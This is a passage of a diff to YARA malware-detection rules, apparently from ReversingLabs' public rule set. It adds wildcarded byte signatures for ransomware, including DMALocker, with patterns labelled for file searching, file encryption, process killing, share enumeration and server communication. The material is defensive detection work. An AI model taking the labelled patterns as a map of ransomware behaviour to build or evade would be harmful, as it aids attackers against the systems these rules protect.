?? 50 89 74 24 ?? FF D3 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 8B E8 83 FD ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 + 74 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 44 24 ?? 50 E8 + ?? ?? ?? ?? F6 44 24 ?? ?? 8B F0 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? + 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? + 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? + 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? + ?? ?? 50 FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 50 FF B4 24 + ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? + 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? + 50 FF D3 6A ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D + 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 74 24 ?? 59 8D 44 24 ?? 50 + 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 + ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C2 + } + $search_files_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 8B F8 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 + 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? F6 C3 ?? 74 ?? 8D 85 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 6A ?? 6A + ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 + 04 B7 51 50 FF 15 ?? ?? ?? ?? 46 FE 85 ?? ?? ?? ?? D1 EB 75 ?? EB ?? 68 ?? ?? ?? ?? + FF 34 B7 FF 15 ?? ?? ?? ?? 85 C0 74 + } + $encrypt_files_2 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 24 24 ?? 53 55 56 57 E8 ?? ?? ?? ?? 8B D0 8D 4C 24 + ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? + ?? 8B 35 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? + ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 7C 24 ?? + FF D3 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 7C ?? ?? ?? ?? 8D 44 + 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F8 33 D2 F6 44 + 24 ?? ?? 8B CF 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 + ?? ?? ?? ?? 50 FF D3 8D 94 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? + 42 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 + 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 + ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 51 6A ?? 5A 8B + CF E8 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? + ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? + ?? ?? 50 FF D3 6A ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B 7C 24 ?? 59 8D 44 24 ?? + 50 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? E8 + ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C2 + } + $kill_specific_processes_2 = { + 81 EC ?? ?? ?? ?? 56 57 6A ?? 5E 56 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 + 74 24 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 84 24 ?? + ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 53 55 BE ?? ?? ?? + ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 8B E8 33 D2 85 ED 7E ?? 0F BE 0C 1A E8 ?? ?? ?? ?? 88 04 1A 42 3B D5 7C ?? FF 36 + 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? 85 C0 74 ?? 33 DB + 53 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? FF B4 + 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8D + 44 24 ?? 50 53 53 68 ?? ?? ?? ?? 53 53 53 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? + ?? 8D 84 24 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? + ?? ?? ?? 5D 5B 5F 5E 81 C4 ?? ?? ?? ?? C2 + } + $kill_specific_processes_1 = { + 81 EC ?? ?? ?? ?? 55 56 57 6A ?? 5E 56 33 ED 8D 44 24 ?? 55 50 E8 ?? ?? ?? ?? 83 C4 + ?? 89 74 24 ?? 55 6A ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 83 FF ?? 0F 84 ?? ?? ?? ?? + 53 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 8B 5C + 24 ?? 83 BC 24 ?? ?? ?? ?? ?? 8B F5 7E ?? 55 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? + 8B E8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 DB 89 44 24 ?? 85 C0 7E ?? 8B F8 + 0F BE 0C 2B 51 E8 ?? ?? ?? ?? 88 04 2B 43 3B DF 7C ?? 8B 84 24 ?? ?? ?? ?? FF 34 B0 + 55 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 46 50 5D 3B B4 24 ?? ?? ?? ?? 7C ?? 8B 7C 24 + ?? 33 ED 85 DB 74 ?? 55 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 55 50 FF + 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 + ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 ?? 50 FF 15 ?? ?? ?? + ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 55 55 68 ?? ?? ?? ?? 55 55 55 8D 84 24 ?? ?? ?? ?? + 50 55 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? + ?? ?? 57 FF 15 ?? ?? ?? ?? 5B 5F 5E 5D 81 C4 ?? ?? ?? ?? C2 + } + $encrypt_files_3 = { + 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 74 ?? ?? + ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 44 24 ?? 50 E8 ?? ?? ?? + ?? F6 44 24 ?? ?? 8B F0 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 E8 ?? + ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 44 24 ?? 50 FF + D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF + D7 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 50 FF 74 24 ?? 8D 84 24 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 84 24 + ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 74 24 ?? 59 8D 44 24 ?? 50 55 FF 15 + } + $search_files_2 = { + 53 55 56 57 8B 3D ?? ?? ?? ?? 6A ?? 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 8B E8 FF 15 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 8D 84 24 ?? ?? + ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? F6 C3 ?? 74 ?? 8D 84 24 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? C6 84 + 24 ?? ?? ?? ?? ?? FF D7 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 44 B5 ?? 51 50 + FF 15 ?? ?? ?? ?? 46 FE 84 24 ?? ?? ?? ?? D1 EB 75 ?? 33 FF 85 F6 7E ?? 8B 9C 24 ?? + ?? ?? ?? 8D 44 24 ?? 2B E8 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8C + 24 ?? ?? ?? ?? 89 48 ?? 8D 0C BD ?? ?? ?? ?? 03 CD 89 58 ?? 8B 4C 0C ?? 89 08 33 C9 + 51 51 50 68 ?? ?? ?? ?? 51 51 FF 15 ?? ?? ?? ?? 89 44 BC ?? 47 3B FE 7C ?? 6A ?? 6A + ?? 8D 44 24 ?? 50 56 FF 15 + } + $kill_specific_processes_3 = { + E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 55 6A ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 83 FF + ?? 0F 84 ?? ?? ?? ?? 53 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 + E8 ?? ?? ?? ?? 8B 5C 24 ?? 83 BC 24 ?? ?? ?? ?? ?? 8B F5 7E ?? 55 8D 84 24 ?? ?? ?? + ?? 50 E8 ?? ?? ?? ?? 8B E8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 DB 89 44 24 + ?? 85 C0 7E ?? 8B F8 0F BE 0C 2B 51 E8 ?? ?? ?? ?? 88 04 2B 43 3B DF 7C ?? 8B 84 24 + ?? ?? ?? ?? FF 34 B0 55 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 46 50 5D 3B B4 24 ?? ?? + ?? ?? 7C ?? 8B 7C 24 ?? 33 ED 85 DB 74 ?? 55 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 55 50 FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF + 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 + ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 55 55 68 ?? ?? ?? ?? 55 55 55 + 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? + ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Wemade Entertainment co.,Ltd" and pe.signatures[i].serial=="29:f4:26:80:e6:53:cf:8f:af:d0:e9:35:55:3f:7e:86" and 1390175999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($search_files_1 and $encrypt_files_1 and $kill_specific_processes_1) or ($search_files_1 and $encrypt_files_2 and $kill_specific_processes_2) or ($search_files_2 and $encrypt_files_3 and $kill_specific_processes_3)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0C15 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Dmalocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects DMALocker ransomware." author = "ReversingLabs" - id = "4a7a5404-1a20-53a7-9670-6f5215582c9d" - date = "2023-11-08" - modified = "2023-11-08" + id = "3ddef0f1-61c9-59f6-a02c-35768c2cd4d6" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L297-L313" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1ee88813270dddeeedd90edbce9be2ce74303a6799ee64b0e9bfaea7377d3b2d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.DMALocker.yara#L1-L149" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "107dbc4cacd9d451e9c6fe8aa91cd612f70ac767ee70f74f3a77d1e5548b054f" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "DMALocker" + tc_detection_factor = 5 importance = 25 + strings: + $dmalock_v1_encrypt_files_1 = { + 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? + ?? ?? A3 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 + F8 ?? 75 ?? 32 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8A 9D ?? ?? ?? + ?? 33 C0 84 DB 74 ?? EB ?? 8D [2-5] 8A 90 ?? ?? ?? ?? 84 D2 74 ?? 8A 8C 05 + ?? ?? ?? ?? 3A CA 74 ?? 80 F1 ?? 3A CA 75 ?? 40 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 8A 8C + 05 ?? ?? ?? ?? 3A 88 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 84 DB 74 ?? 8A 90 ?? ?? ?? + ?? 84 D2 74 ?? 8A 8C 05 ?? ?? ?? ?? 3A CA + } + $dmalock_v1_encrypt_files_2 = { + EB ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? + 8D 95 ?? ?? ?? ?? 52 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? + ?? 8B 4D ?? 5F 5E 33 CD B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $dmalock_v1_encrypt_files_3 = { + 74 ?? 80 F1 ?? 3A CA 75 ?? 40 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 8A 8C 05 ?? ?? ?? ?? 3A + 88 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 8D 95 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 52 E8 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 83 C4 ?? A8 ?? 74 ?? A8 ?? 0F 85 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 50 56 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 55 + ?? 8B 85 ?? ?? ?? ?? 52 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 + } + $dmalock_v1_enum_shares_and_discs_type_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ?? + ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? 83 C4 ?? 89 ?? ?? ?? ?? ?? C6 85 ?? + ?? ?? ?? ?? 85 ?? 0F 84 ?? ?? ?? ?? ?? 32 DB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? ?? + 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 ?? 6A ?? 89 45 ?? 66 89 45 ?? 88 45 ?? 8D 45 ?? + 6A ?? 50 88 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 75 ?? B3 ?? 6A ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 5F 5E 5B 8B 4D ?? 33 CD + E8 ?? ?? ?? ?? 8B E5 5D C3 8D 95 ?? ?? ?? ?? 52 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 72 ?? C6 + 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? + 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 51 52 68 + } + $dmalock_v1_enum_shares_and_discs_type_2 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 8B 5D ?? 56 57 + 8D 8D ?? ?? ?? ?? 51 50 6A ?? 6A ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B 95 ?? ?? ?? + ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 85 FF 75 ?? 50 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? + ?? 8D A4 24 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 57 8D 95 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? 76 ?? 8D 77 ?? EB ?? 8D A4 24 + ?? ?? ?? ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 + C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0E 8B C1 83 C4 ?? 8D 78 ?? 8B FF 8A 10 40 84 + D2 75 ?? 2B C7 50 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 06 83 C4 ?? 8D 50 ?? 90 + 8A 08 40 84 C9 75 ?? 2B C2 6A ?? 8D 84 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 8B 4D ?? 83 C4 ?? 51 8D 95 ?? ?? ?? ?? 53 52 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 + C4 ?? 8B 46 ?? 83 E0 ?? 3C ?? 75 ?? 8B 4D ?? 51 53 8D 56 ?? 52 E8 ?? ?? ?? ?? 85 C0 + 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 40 83 C6 ?? 89 85 ?? + ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 50 + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 8B 4D ?? F7 D8 5F 1B C0 5E 33 CD 40 5B E8 ?? ?? ?? ?? 8B E5 5D C2 + } + $dmalock_v1_enum_shares_and_discs_type_3 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? 6A ?? 51 8B D8 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? ?? ?? BF ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? F7 C3 ?? ?? ?? ?? 76 ?? 57 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? + ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B F0 56 68 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 74 ?? 83 FE ?? 74 ?? 83 FE ?? 75 ?? 8B + 55 ?? 8B 85 ?? ?? ?? ?? 52 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 47 D1 EB + FF 8D ?? ?? ?? ?? 75 ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $dmalock_v2_enum_logical_disks = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 33 DB 68 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 53 50 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F BE 4D ?? 51 8D 95 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 88 9D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? + ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 85 C0 75 ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? + B0 ?? 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 8A C3 33 CD 5B E8 ?? ?? + ?? ?? 8B E5 5D C3 + } + $dmalock_v4_remote_server_communication = { + 85 FF 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 FB ?? 0F + 87 ?? ?? ?? ?? FF 24 9D ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 + C4 ?? B0 ?? C3 8B 4E ?? 8B 56 ?? 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 + ?? C3 8B 46 ?? 8B 4E ?? 50 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B + 56 ?? 8B 46 ?? 52 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 4E ?? 8B + 56 ?? 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 46 ?? 8B 4E ?? 8B + 56 ?? 50 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 